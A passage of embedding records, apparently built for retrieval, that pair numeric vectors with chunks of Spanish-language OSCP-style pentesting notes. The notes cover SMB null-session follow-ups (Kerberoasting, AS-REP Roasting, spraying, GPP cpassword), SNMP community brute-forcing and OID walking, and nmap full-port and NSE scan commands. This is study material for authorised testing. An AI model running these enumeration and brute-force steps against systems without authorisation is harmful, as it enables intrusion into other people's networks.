0.03379, -0.01838, -0.05628, 0.01374, 0.00784, 0.09084, -0.05481, -0.01028, -0.06677, 0.03006, -0.1453, 0.00885, 0.03378, -0.0325, 0.20533, 0.00912, -0.00336, -0.12384, 0.01536, 0.05711, 0.0239, 0.02627, -0.01684, -0.04757, -0.0988, -0.12713, -0.03103, -0.19147, -0.05261, 0.00383, -0.01335, 0.06623, -0.00749, -0.05528, 0.01445, 0.0977, 0.04425, -0.02304, 0.05767, 0.04483, -0.01826, -0.0498, -0.02528, 0.02239, 0.00911, -0.00719, 0.04421, -0.02769, -0.08304, 0.02176, 0.0409, 0.04015, -0.02905, 0.17074, -0.01621, 0.01537, -0.029, -0.02935, 0.03075, 0.00144, 0.02508, 0.1554, -0.15441, -0.02713, 0.12477, 0.10815, 0.02336, -0.02616, 0.03908, 0.02203, -0.08723, 0.06031, 0.03518, 0.01498, -0.02245, 0.06901, 0.08665, -0.05542, 0.06597, 0.06431, 0.02976, 0.12285, 0.00384, 0.08707, -0.00861, 0.07244, -0.05429, 0.08726, 0.02587, -0.03293, -0.00479, -0.06275, -0.00702, 0.00072, -0.00777, 0.02644, -0.02024, -0.0323, -0.01063, -0.06005, -0.01001, -0.02947, 0.07431, 0.03517, 0.02765, -0.02358, -0.00368, -0.07351, 0.03216, -0.0008, 0.02216, 0.00807, -0.02555, -0.01985, 0.00204, 0.04691, 0.03345, -0.04129, 0.01997, 0.06181, 0.01143, -0.01445, -0.03682, -0.02632, 0.05135, 0.11842, 0.07768, 0.0172, -0.00487, 0.01603, 0.01968, 0.00868, -0.0506, 0.01722, 0.07264, 0.02302, 0.06703, 0.0658, 0.08749, -0.00806, -0.03027, -0.0568, -0.0375, -0.00573, -0.02727, -0.0128, -0.01198, -0.06399, -0.05642, -0.07823, -0.02005, -0.03379, -0.02554, -0.00691, -0.01475, -0.0216, 0.00874, -0.0372, 0.05406, -0.04834, -0.01905, 0.01944, -0.01831, 0.02621, 0.02619, -0.01672, -0.0263, -0.02392, 0.02802, -0.0379, 0.05232, -0.05148, -0.03171, -0.04654, -0.01741, -0.0913, -0.00148, -0.03216, 0.00436, 0.04339, 0.02461, -0.00235, 0.05899, -0.07269, 0.05573, 0.01602, -0.00102, 0.04788, -0.00846, -0.06847, -0.06418, 0.04394, 0.0503, -0.04236, -0.01151, 0.00048, 0.00999, -0.01645, -0.00524, 0.00289, 0.04794, 0.04169, -0.00678, 0.0493, 0.03064, -0.07934, 0.00532, -0.02569, -0.06348, 0.01082, -0.06484, 0.00937, 0.01891, -0.03167, -0.06346, 0.00595, -0.01643, -0.03403, -0.0625, -0.10177, -0.03552, -0.05423, 0.06979, 0.04696, -0.00491, 0.00098, -0.03313, -0.01872, -0.05299, 0.01667, 0.03077]} +{"tipo": "metodologia", "herramienta": "SMB", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "texto": "## Sesión nula → siguiente paso\nUsuarios válidos → AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` → GPP cpassword.\n\nRelacionado: SNMP · Active Directory · OSCP MOC", "v": [-0.14474, -0.12437, -0.01143, -0.18045, -0.08649, -0.22888, -0.01809, -0.09487, -0.06851, 0.20182, -0.05587, -0.06553, 0.0629, -0.07959, 0.0925, 0.03909, -0.04648, 0.08512, -0.07953, 0.17739, -0.10152, 0.05381, -0.10808, -0.00561, 0.09924, 0.20456, -0.02184, -0.08836, -0.04234, -0.03458, -0.00842, -0.0376, -0.11485, -0.04776, -0.13537, -0.03205, -0.04796, 0.02893, 0.11762, 0.14551, -0.08042, 0.09474, -0.1755, 0.10172, 0.07519, -0.0632, 0.06819, -0.01391, -0.04358, -0.00098, 0.02209, 0.05253, -0.17336, -0.01677, -0.02932, 0.0324, 0.08054, 0.03517, -0.15127, 0.00902, 0.01502, 0.0931, -0.0179, -0.11635, -0.07172, -0.12444, 0.02883, -0.10734, -0.07473, 0.12625, -0.04834, 0.04793, 0.04613, 0.04598, 0.03352, -0.03664, 0.16544, -0.04015, 0.03424, 0.11215, 0.03925, -0.06641, 0.01005, -0.02956, 0.01356, -0.01125, 0.09555, -0.0604, -0.00106, -0.05555, 0.08295, 0.05266, 0.04522, 0.05034, 0.06019, -0.10988, -0.07968, -0.01988, 0.03337, -0.04909, -0.00157, 0.02476, -0.04521, 0.02933, 0.00944, -0.00381, 0.08354, 0.08744, 0.09636, -0.02742, 0.09286, -0.03757, 0.04847, -0.04532, 0.08803, 0.02927, -0.02964, -0.01933, -0.01507, 0.04871, -0.04056, 0.03539, -0.01623, 0.02972, -0.01712, 0.05769, 0.04862, 0.06535, -0.05737, 0.06537, -0.0198, -0.00897, -0.0882, 0.00736, -0.00938, -0.02689, 0.00571, 0.04168, 0.00578, -0.07601, -0.05869, -0.02423, -0.00359, 0.07571, -0.00757, -0.03203, 0.01354, -0.04637, 0.0303, 0.01702, 0.03764, -0.01186, -0.05425, 0.02302, 0.0584, 0.04192, 0.01235, -0.00897, -0.04375, 0.02817, -0.00416, 0.01704, 0.01547, 0.0281, -0.01403, 0.07815, -0.01239, -0.02477, 0.00026, -0.04415, 0.01736, -0.03887, -0.00378, 0.0245, 0.0133, -0.02999, 0.06, -0.00857, 0.02122, -0.06687, 0.01836, -0.07308, 0.09117, 0.06545, 0.01986, -0.01607, 0.05472, 0.00754, 0.05131, -0.01979, -0.00844, -0.01312, 0.00478, -0.02889, 0.01713, -0.05435, 0.04302, -0.05525, -0.06132, 0.01109, 0.02421, 0.04002, -0.01694, -0.00806, 0.03067, -0.04506, 0.05457, 0.06118, -0.04868, 0.02345, -0.03361, -0.01408, 0.04096, -0.03036, -0.01325, -0.00571, -0.00195, 0.02338, -0.01939, 0.05779, 0.02741, 0.02988, 0.02781, -0.01443, 0.00849, 0.00457, -0.03597, -0.05021, -0.00789, 0.01087, 0.03114, -0.01597, 0.01651, -0.04333, 0.04013, 0.0054, -0.07789, 0.03139, -0.01079, 0.00545, 0.04363, -0.05854, 0.02483, 0.02785, -0.06654, 0.02065, 0.00731, -0.03915, 0.03436, -0.00285, 0.02448, -0.04949, -0.03223, -0.03347, -0.02179, 0.02781]} +{"tipo": "metodologia", "herramienta": "SNMP", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). Recuérdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "v": [-0.04638, -0.11599, -0.02498, -0.23769, -0.02011, -0.00788, 0.15121, -0.05079, -0.17789, 0.13599, 0.05103, 0.09377, 0.14782, -0.13972, -0.28221, -0.10773, -0.10177, 0.03213, 0.10617, 0.02358, -0.02778, 0.09535, -0.03146, 0.02621, 0.12746, 0.057, -0.03227, 0.04416, 0.04984, -0.07336, 0.08702, 0.00853, -0.12243, -0.0616, -0.02006, -0.02593, 0.06012, 0.03094, 0.06601, 0.08159, 0.0675, 0.07856, -0.05969, 0.00963, 0.14709, -0.02147, -0.02479, -0.06644, -0.00631, -0.04326, -0.02553, 0.11698, -0.10593, -0.02603, -0.10076, 0.1332, 0.08236, 0.12502, -0.00548, 0.00915, 0.05209, 0.00808, -0.03328, -0.14735, -0.03433, -0.06103, 0.01419, -0.01181, -0.11848, 0.03154, -0.02, -0.02424, 0.04669, -0.07841, 0.09824, -0.08721, -0.03939, -0.01367, 0.13206, 0.09097, -0.07416, -0.04033, -0.08573, -0.00254, -0.04882, -0.02485, 0.02238, -0.07323, -0.05247, -0.12962, 0.06442, -0.02353, 0.01019, 0.05698, 0.04772, -0.08765, -0.0176, 0.10068, 0.05177, 0.10091, -0.00896, 0.15165, -0.09151, 0.01151, 0.00225, 0.08535, 0.08045, -0.036, 0.0775, 0.00917, 0.02764, -0.0022, 0.00577, -0.05607, -0.04852, -0.03326, -0.03488, -0.01486, 0.06685, -0.07497, -0.00478, -0.012, -0.00278, -0.0104, 0.01821, 0.01315, 0.00644, 0.09279, 0.09169, 0.00768, 0.00471, -0.0104, -0.10782, -0.01788, -0.03547, -0.0023, 0.01184, 0.00335, 0.02272, 0.00563, 0.00982, 0.05053, -0.05537, 0.00894, 0.09528, 0.02528, 0.04822, -0.02526, 0.01122, 0.04182, 0.04233, 0.07394, -0.04465, -0.01246, 0.00745, -0.07271, -0.00532, -0.11305, -0.07489, 0.03458, 0.01144, 0.01692, 0.03383, 0.06994, 0.07011, -0.0366, -0.03157, 0.04285, -0.00089, -0.03279, 0.01968, -0.00492, -0.04458, 0.00719, -0.08101, -0.04745, -0.01655, -0.05257, 0.05947, 0.03168, -0.05402, -0.00288, -0.00875, 0.03037, -0.02054, 0.00692, 0.03976, -0.018, 0.03516, 0.00343, 0.04009, -0.05454, 0.02332, 0.0282, -0.03318, 0.02331, -0.00293, -0.09693, 0.03447, -0.02255, -0.04043, -0.02412, 0.00825, -0.0668, -0.01879, 0.01558, -0.04199, 0.08447, -0.046, 0.03482, 0.01187, -0.05382, 0.03921, -0.06145, -0.00374, -0.01891, -0.08777, 0.02173, 0.04361, 0.03577, -0.00052, 0.05725, -0.02335, 0.02139, 0.00387, -0.03773, 0.00398, 0.03534, 0.03512, -0.02364, -0.02946, 0.01301, -0.01217, -0.0647, 0.03713, 0.00435, -0.02613, -0.00564, -0.03676, -0.01167, 0.02437, -0.01565, -0.04184, -0.00637, -0.02501, -0.06944, -0.04116, 0.04489, -0.00479, 0.00993, 0.0229, -0.03948, 0.01485, -0.04203, -0.004, -0.03766]} +{"tipo": "metodologia", "herramienta": "SNMP", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el árbol de OIDs\nsnmp-check IP -c public # enumeración bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "v": [0.03027, -0.17648, -0.1296, -0.04372, 0.01708, -0.2959, -0.1032, -0.11771, -0.02378, 0.08936, 0.0659, -0.15118, 0.07565, -0.12707, -0.06075, 0.09289, 0.07103, -0.10991, 0.03671, 0.04288, -0.01987, 0.14914, -0.0731, 0.02708, 0.05196, 0.09953, -0.08325, 0.12314, -0.12093, -0.12896, -0.08843, -0.08667, -0.00681, 0.04872, -0.16873, -0.07275, -0.09825, 0.0327, -0.00234, 0.07622, -0.10134, 0.03686, -0.12897, 0.06471, 0.03756, 0.01492, 0.02153, 0.05298, -0.02076, -0.17749, -0.20631, -0.10496, -0.14707, -0.07293, -0.10861, 0.03905, 0.01091, 0.0466, -0.0804, 0.02518, 0.01312, 0.10686, -0.03311, -0.12585, 0.01801, -0.04968, -0.04061, 0.00486, -0.02599, -0.04077, -0.00078, -0.04368, -0.02907, 0.00996, 0.01405, -0.01128, 0.0096, -0.13738, 0.08362, 0.04606, -0.03959, -0.01533, -0.03345, -0.05647, 0.02531, 0.01334, 0.06174, -0.11319, -0.03166, 0.03539, 0.00934, 0.01755, -0.01685, 0.065, 0.02873, -0.06861, 0.03214, 0.01403, 0.02535, -0.00365, -0.02226, 0.10446, -0.12941, 0.00443, 0.01457, 0.00868, 0.09078, 0.08079, 0.01735, 0.0322, 0.05688, -0.00638, 0.08885, 0.03189, 0.01756, -0.0423, -0.08534, -0.05218, 0.01011, 0.02315, 0.00291, -0.04015, -0.04775, 0.03737, -0.01709, 0.01647, 0.02526, 0.06787, 0.04509, -0.09838, -0.01115, -0.06018, 0.02507, -0.01184, -0.04469, 0.00509, 0.0265, -0.0312, 0.01529, 0.01961, 0.0617, -0.00732, -0.02651, 0.0373, 0.07693, 0.02328, 0.04567, -0.05881, -0.03025, 0.01134, 0.08751, 0.00591, 0.00965, 0.03365, 0.01415, 0.00474, -0.01254, 0.01089, -0.03317, 0.0049, -0.09521, -0.04625, 0.09866, -0.01031, 0.0286, 0.0846, -0.05545, 0.00095, 0.08634, -0.05165, 0.01265, -0.01955, 0.01264, -0.04977, 0.01931, -0.13669, -0.01455, -0.01005, 0.00685, 0.01229, -0.01316, -0.02851, 0.02516, 0.03555, -0.02575, -0.02994, -0.0019, -0.01799, 0.02927, -0.00816, 0.07959, 0.00695, -0.00318, -0.02865, 0.01257, -0.06892, -0.00069, -0.03118, 0.02512, -0.02813, -0.07281, -0.01464, -0.05965, 0.00244, 0.05881, -0.01758, 0.03847, -0.01969, 0.00536, -0.0102, 0.01191, -0.05584, 0.05951, -0.00793, -0.01278, 0.00421, 0.02446, 0.02658, -0.0318, -0.01693, -0.0479, 0.03635, 0.03897, 0.02334, 0.01716, 0.06256, 0.01377, 0.01992, 0.02767, -7e-05, -0.07776, 0.05009, -0.01466, -0.0548, 0.06867, -0.00783, -0.05623, 0.01723, -0.04391, -0.06641, 0.04544, 0.03493, -0.04246, -0.03029, -0.05647, -0.05025, -0.06937, 0.03038, 0.05591, -0.0494, -0.03942, -0.03585, 0.00434, -0.05123, -0.0141, 0.0037]} +{"tipo": "metodologia", "herramienta": "SNMP", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "texto": "## OIDs útiles (numéricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecución (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = dirección jerárquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los números del final.\n\nRelacionado: Nmap · SMB · Enumeración · OSCP MOC", "v": [0.09887, -0.09821, -0.02672, 0.05875, -0.01903, 0.00254, -0.16677, 0.02856, 0.00575, 0.00648, -0.00466, -0.09974, 0.01793, -0.18221, -0.12747, -0.04634, -0.09159, -0.00482, -0.06726, 0.11509, 0.01063, 0.06182, -0.04039, -0.03607, 0.05029, 0.18047, -0.0818, 0.03935, -0.05584, -0.02118, 0.0714, 0.00571, 0.0196, -0.02252, -0.00601, -0.01075, -0.0933, 0.0049, 0.02761, 0.04408, 0.07798, 0.02323, 0.01547, 0.07162, 0.00861, -0.04492, 0.02793, 0.05252, -0.11336, -0.03744, 0.0903, -0.01059, 0.05129, 0.01736, -0.09049, -0.04917, 0.11978, 0.05242, -0.12958, -0.04689, 0.10237, -0.00834, 0.01288, -0.05046, 0.00378, -0.00926, 0.00082, 0.04947, 0.05302, 0.11122, 0.04035, 0.06907, -0.11411, -0.03622, 0.04311, 0.00225, 0.06181, -0.0269, 0.03714, 0.05705, -0.07485, -0.01412, 0.02695, -0.06792, -0.01406, -0.03171, 0.04911, -0.09795, -0.03354, 0.07715, 0.05357, 0.07252, 0.0354, 0.03367, 0.00121, -0.1041, -0.04127, 0.08214, 0.08901, -0.04246, 0.0465, 0.0119, -0.10978, 0.06481, 0.03685, 0.00266, 0.14021, -0.06384, -0.10189, -0.00708, 0.08829, 0.04476, 0.00748, 0.07531, -0.09214, 0.02301, 0.09451, 0.01523, 0.03047, -0.01919, -0.01695, 0.05182, 0.00631, -0.00226, -0.09841, -0.06982, -0.06526, 0.04169, 0.10548, -0.03003, 0.04052, -0.01939, -0.06915, 0.00034, -0.11884, 0.03066, 0.02553, -0.01304, 0.03517, -0.03068, 0.03971, 0.11321, -0.02972, 0.02436, 0.03013, 0.06556, -0.00066, -0.03126, -0.08977, 0.10233, -0.02613, 0.04543, -0.01032, 0.02268, 0.00597, 0.03718, -0.02609, -0.0618, 0.02472, 0.0234, -0.07612, 0.061, 0.09485, 0.05549, -0.10727, -0.08574, 0.02446, 0.00619, 0.02808, -0.10627, 0.05723, -0.05726, -0.09558, -0.05391, -0.04276, -0.1329, 0.03553, -0.03452, -0.09291, 0.00875, -0.05601, -0.0191, -0.02333, 0.08782, -0.01041, -0.04862, 0.01739, -0.02007, 0.03894, 0.04586, 0.07301, -0.0758, 0.02377, 0.00852, 0.0308, -0.12838, 0.01933, -0.08624, -0.05044, -0.06307, -0.01945, 0.01358, -0.08084, -0.00383, -0.02699, 0.01696, 0.07151, -0.03198, -0.00244, -0.0555, 0.01083, -0.03648, 0.00709, 0.04449, -0.10772, -0.05055, 0.0319, 0.0718, 0.01426, 0.09617, 0.05178, -0.01255, -0.04989, -0.0126, 0.06417, 0.03777, 0.08806, -0.00082, -0.00872, 0.03709, -0.04974, 0.05249, 0.17216, -0.06859, -0.06612, -0.07123, 0.06007, 0.01035, -0.07519, -0.05757, -0.06883, 0.00809, -0.00256, -0.04753, -0.08887, -0.02798, -0.06311, 0.03511, -0.00507, -0.02642, -0.17908, -0.0163, -0.0252, -0.05889, 0.06158, -0.06996]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "# Nmap NSE (scripts)\n\n> El motor de scripts de Nmap: enumeración profunda y detección de vulns sin herramientas extra. Scripts en `/usr/share/nmap/scripts/`.", "v": [0.10024, -0.0766, -0.11455, -0.19547, -0.0315, -0.14446, -0.21588, -0.05669, 0.04942, 0.03487, -0.08415, -0.0907, 0.04065, -0.17384, -0.1205, 0.04187, -0.07432, -0.13258, 0.04996, 0.13292, -0.0866, -0.02251, -0.02929, 0.05067, -0.10063, 0.0217, -0.09942, 0.04342, -0.1436, -0.01581, -0.04246, 0.12031, 0.03167, -0.13934, -0.04443, -0.05137, 0.02131, -0.07849, 0.01909, 0.1789, -0.032, 0.07824, -0.09892, 0.06755, 0.01239, -0.14292, 0.02896, -0.02145, 0.0797, -0.08517, 0.04029, 0.02027, -0.12911, 0.03347, -0.04224, 0.01902, 0.04916, -0.1335, -0.03353, 0.06506, -0.04171, -0.05297, -0.00119, -0.11362, -0.00242, -0.02811, 0.07568, -0.18122, -0.13747, 0.00105, -0.03518, 0.07864, 0.00535, -0.01564, 0.06566, -0.04335, -0.07282, -0.07689, -0.0031, 0.05719, -0.02406, -0.06825, -0.05631, 0.0204, -0.0402, -0.07405, -0.01404, -0.01856, -0.05978, -0.09857, 0.10373, 0.05019, -0.0052, 0.02412, 0.04683, -0.07629, 0.02793, -0.00971, 0.07056, 0.04546, 0.00856, -0.10274, -0.04686, 0.11651, 0.02052, 0.09596, 0.08746, 0.08091, 0.04795, 0.0474, 0.13736, 0.11569, -0.06179, 0.00964, 0.00215, -0.02431, -0.01144, 0.04551, 0.00471, -0.09908, -0.00177, 0.02696, -0.05493, -0.02117, 0.00115, -0.03013, -0.04537, -0.00194, -0.01728, -0.017, -0.12511, -0.008, -0.09622, -0.05505, -0.03878, 0.10263, 0.06114, 0.02782, -0.05552, -0.02775, 0.04913, 0.00975, 0.06167, 0.05145, 0.02027, -0.03179, -0.04538, -0.07374, -0.00309, 0.00864, 0.00457, 0.01439, -0.02213, 0.02569, 0.01671, -0.12736, 0.02617, 0.02337, -0.10384, -0.0099, 0.00596, -0.03482, -0.04264, 0.0966, 0.03302, 0.01822, -0.02711, -0.00481, 0.02379, 0.00543, 0.05173, 0.02466, 0.08611, -0.08375, 0.01188, -0.05713, 0.02128, -0.06162, -0.04748, -0.04292, 0.01382, 0.00236, 0.02773, -0.00668, -0.06276, -0.00157, -0.01239, -0.01604, -0.00028, 0.01071, -0.03417, 0.02915, -0.0531, -0.07373, -0.02112, -0.03777, -0.04541, -0.02528, -0.01796, -0.01701, -0.05579, 0.07226, -0.03074, -0.0239, 0.01239, 0.01423, -0.01796, -0.03031, -0.07681, -0.0418, 0.02499, 0.00049, -0.03274, 0.00338, -0.0234, -0.08351, -0.00879, 0.08014, 0.02846, -0.06109, 0.0188, 0.00419, 0.01964, -0.03525, 0.01693, -0.03573, 0.03793, 0.00999, 0.02898, 0.02756, 0.0217, 0.00091, -0.04159, 0.01276, 0.01843, -0.0459, -0.04233, 0.00099, -0.0087, -0.01897, -0.01657, 0.00556, 0.01206, -0.0823, -0.03187, -0.04628, 0.01142, -0.05406, 0.0161, 0.04998, 0.00206, -0.03143, 0.01222, -0.05726, 0.02262, -0.00542]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "## El comando que usas siempre\n```bash\nsudo nmap -sCV -p- IP # -sCV = -sC (scripts default) + -sV (versión)", "v": [0.09686, -0.13722, -0.06741, -0.08931, 0.00445, -0.26168, 0.05455, -0.12652, 0.04116, 0.01633, 0.0285, -0.17502, -0.03256, -0.0933, -0.11235, 0.1164, 0.00022, -0.11414, 0.06641, 0.06146, 0.04727, 0.03412, -0.02229, 0.04415, -0.01886, 0.17529, -0.08731, 0.06458, -0.10969, -0.14902, -0.05639, 0.04394, -0.03364, -0.0224, -0.08074, 0.0094, -0.06002, 0.0032, -0.03815, 0.26929, 0.02678, 0.04896, -0.14148, -0.00646, 0.0593, -0.17431, 0.10203, 0.02166, 0.00697, -0.08764, -0.03215, -0.01458, -0.08353, 0.0294, -0.06939, 0.11896, 0.05707, -0.11471, -0.04689, 0.01628, -0.06546, 0.00871, 0.00867, 0.05202, -0.01736, 0.03904, -0.08949, -0.16917, -0.06936, -0.02443, -0.07217, 0.05686, -0.09944, 0.01551, 0.11487, -0.05428, -0.05655, -0.11071, 0.1383, 0.01434, -0.07175, -0.02213, -0.05865, 0.00769, -0.03291, -0.08784, -0.00814, -0.07917, -0.01745, -0.02263, 0.07945, 0.04186, 0.00055, 0.03336, 0.10608, -0.06218, 0.01073, 0.03923, 0.06215, -0.01525, -0.0071, 0.01333, -0.04279, 0.10284, 0.06736, 0.08005, 0.13909, -0.00264, 0.02484, 0.08957, 0.10284, 0.02717, 0.06192, -0.0398, -0.00993, 0.02955, -0.03067, -0.0539, -0.00594, -0.05732, -0.08441, -0.00165, 0.00881, 0.04559, -0.0034, -0.0144, -0.03483, 0.03634, 0.02752, 0.03856, -0.0755, -0.04723, 0.05323, -0.0399, -0.04386, 0.15777, 0.03221, -0.03009, -0.07756, -0.064, 0.00642, 0.03596, 0.00788, 0.03329, 0.12619, -0.01258, 0.00827, -0.13022, 0.00992, 0.04065, 0.0524, 0.06785, -0.00607, -0.01419, 0.01706, -0.00033, -0.02677, -0.01685, -0.0042, 0.02592, 0.0541, -0.00448, -0.01584, 0.06609, -0.01148, 0.00363, -0.03127, -0.03849, 0.03681, 0.00432, 0.03443, 0.01195, 0.03263, -0.04818, -0.01675, -0.06895, 0.06086, -0.00972, -0.00799, 0.03637, 0.02649, 0.00248, -0.0091, 0.00421, 0.00777, -0.01806, 0.01181, 0.01236, -0.02155, -0.09477, -0.00846, 0.03776, -0.00617, -0.04813, 0.03611, 0.00306, -0.01346, -0.05141, -0.00605, -0.0317, -0.10287, 0.08035, -0.00965, -0.04061, 0.01975, -0.02503, 0.00267, 0.02684, -0.02695, -0.04428, -0.00905, -0.01576, 0.02255, 0.00645, -0.03046, -0.04731, -0.04233, 0.01211, 0.02901, -0.06527, -0.03007, 0.03603, 0.03165, -0.01643, 0.00744, -0.01915, 0.01924, -0.02623, 0.01, -0.02721, -0.01453, -0.02084, -0.05294, -0.04852, 0.04196, -0.03479, -0.03573, 0.0372, -0.03044, -0.0404, -0.03444, 0.00481, -0.01333, -0.0828, -0.03446, -0.02487, -0.04815, 0.015, -0.02182, 0.03365, 0.00209, 0.00246, -0.03931, -0.03384, -0.05263, -0.00148]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "# patrón real de tu history_contabo.txt:\nnmap IP -p- -Pn --min-rate 5000 -vvv -n --open # rápido todos los puertos\nnmap -p- localhost -sCV # luego versión+scripts sobre lo abierto\n```\nFlujo típico: 1) `-p- --open` rápido para ver QUÉ abre → 2) `-sCV` dirigido a esos puertos.", "v": [0.0357, -0.10943, -0.13101, -0.0599, 0.03162, -0.19431, 0.18973, -0.09697, 0.00429, -0.04424, 0.12359, -0.08085, 0.09139, -0.04383, -0.12169, -0.01447, -0.05455, -0.06652, 0.13461, 0.00475, -0.10895, 0.02617, -0.09284, -0.07088, 0.1096, 0.13412, -0.04432, 0.07769, -0.11584, -0.11118, 0.02665, 0.01062, -0.01507, 0.04802, -0.04766, -0.01716, 0.10802, 0.09099, 0.00496, 0.19786, 0.08508, 0.08664, -0.08992, 0.07655, 0.11328, -0.14061, 0.03278, -0.03798, -0.04748, -0.01282, -0.02669, -0.01804, -0.06496, 0.01353, -0.13715, 0.10094, 0.02711, -0.0284, -0.03812, -0.01966, 0.06268, 0.04213, -0.05291, -0.21869, -0.01376, -0.05006, 0.03029, -0.00948, -0.07499, 0.02093, -0.11788, 0.02478, -0.01651, 0.12018, 0.06187, -0.03187, -0.0538, -0.05813, 0.07397, 0.13713, -0.04617, -0.03883, -0.02705, -0.13841, -0.0276, -0.04245, -0.01176, -0.02694, 0.07058, -0.06504, 0.09259, 0.05004, 0.05, 0.10892, 0.0188, -0.13671, -0.03322, 0.05239, 0.01632, -0.00493, 0.03788, 0.10539, -0.06488, 0.07197, 0.05968, 0.0216, 0.08501, -0.0194, 0.0037, 0.06428, 0.16834, 0.04926, 0.02276, -0.02288, 0.03865, -0.00138, -0.00105, -0.05514, -0.03175, -0.02365, -0.03578, -0.07885, 0.01133, 0.072, -0.05574, -0.0343, 0.04863, 0.00935, 0.07014, 0.06646, -0.08193, -0.0766, -0.03116, -0.02141, -0.0359, 0.00056, 0.08562, -0.03994, -0.01884, -0.01969, -0.01134, -0.00176, -0.02218, 0.05622, 0.06073, -0.07709, -0.01156, -0.1071, -0.07316, 0.07985, 0.07823, -0.00192, 0.00293, -0.03188, -0.0287, -1e-05, 0.05583, -0.02981, -0.06563, 0.00137, 0.07852, 0.06854, 0.04796, 0.00841, -0.0013, -0.06549, -0.02443, -0.02846, 0.08041, -0.02851, 0.06483, 0.01103, -0.02755, -0.08608, 0.0547, -0.06963, 0.05395, -0.08509, -0.04349, -0.01179, 0.01971, -0.01057, -0.02999, 0.03637, -0.03727, -0.09498, 0.03091, -0.06535, -0.01023, -0.02865, 0.0282, -0.03217, -0.0152, -0.00769, 0.01813, 0.02752, -0.00055, -0.03403, -0.01597, -0.01655, -0.06883, 0.01082, -0.01012, -0.02494, 0.0016, 0.0389, -0.01277, 0.0611, -0.05097, -0.00036, 0.00062, 0.01055, 0.04205, 0.03944, -0.04012, 0.02827, -0.10334, 0.01966, 0.02606, -0.0394, -0.04686, 0.05484, -0.01025, 0.00099, 0.01831, -0.04188, 0.02664, -0.02186, 0.01444, 0.00949, -0.01363, 0.02162, -0.04802, -0.02955, 0.02441, 0.00162, -0.04456, 0.01114, -0.00053, 0.00169, 0.00784, -0.00023, 0.01228, -0.05629, -0.02108, -0.0368, -0.06454, 0.0248, -0.02039, 0.01378, -0.0495, -0.01369, -0.03405, -0.06696, -0.01478, 0.00352]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "## Categorías de scripts\n```\ndefault (-sC) los seguros y útiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticación\nbrute fuerza bruta de credenciales\ndiscovery enumeración (snmp, smb, http...)\n```", "v": [0.24318, -0.13038, -0.25733, 0.01624, 0.07556, -0.07448, -0.10905, -0.12675, -0.00079, -0.00308, -0.12197, -0.01651, -0.07303, 0.04641, -0.10222, 0.0209, -0.07329, -0.1694, 0.01759, 0.04438, 0.12407, -0.2059, 0.03863, -0.04282, -0.14631, 0.00361, -0.0964, 0.1609, 0.03993, -0.0313, 0.046, 0.04279, 0.08153, -0.07382, -0.05918, 0.01363, -0.10251, -0.0081, 0.08496, 0.24724, 0.02345, -0.07613, -0.06161, 0.0532, 0.038, -0.09292, -0.09342, 0.02719, -0.03908, -0.07017, -0.1104, 0.02511, -0.15866, -0.0998, -0.11645, -0.04765, 0.03346, 0.02238, -0.03733, 0.04149, -0.15563, 0.05104, 0.03766, 0.01175, 0.01505, -0.06918, 0.03487, -0.0463, -0.05837, 0.06542, -0.09632, -0.07146, 0.02272, 0.00284, -0.00396, -0.05826, -0.02822, -0.00155, 0.06987, 0.07558, -0.00341, -0.03664, 0.0078, -0.00948, -0.09904, -0.07453, 0.06245, -0.07813, -0.02253, 0.01283, 0.13541, 0.02088, -0.01226, 0.0273, -0.0137, -0.04088, 0.02003, 0.01816, 0.03653, -0.01375, -0.07768, -0.03592, -0.03979, 0.06552, 0.10613, 0.01702, -0.00533, 0.04162, 0.05813, -0.02379, 0.05156, 0.05765, -0.02535, 0.00669, -0.02769, 0.05388, -0.05167, -0.05587, 0.07847, -0.02892, -0.08856, -0.09333, 0.01315, 0.02051, 0.00646, -0.00473, 0.00485, 0.04354, 0.02034, -0.03496, -0.00422, -0.03492, -0.03268, 0.00601, -0.00682, 0.03931, 0.03549, -0.07156, -0.03707, -0.01498, 0.05962, 0.07174, 0.03146, 0.01474, 0.05134, 0.09294, -0.01221, -0.06438, -0.0685, 0.02704, 0.04586, 0.11409, -0.02692, 0.09761, 0.018, -0.0109, 0.02996, -0.06562, -0.01718, 0.05658, 0.02011, 0.02803, 0.02039, 0.036, -0.02071, 0.01307, 0.00242, -0.05255, 0.0418, -0.00941, 0.01223, 0.03535, 0.02645, -0.0134, 0.01007, -0.0503, -0.01501, -0.03035, -0.0113, -0.06753, -0.01568, -0.01584, -0.01541, 0.03286, 0.00127, -0.03376, 0.06877, 0.00153, 0.04604, 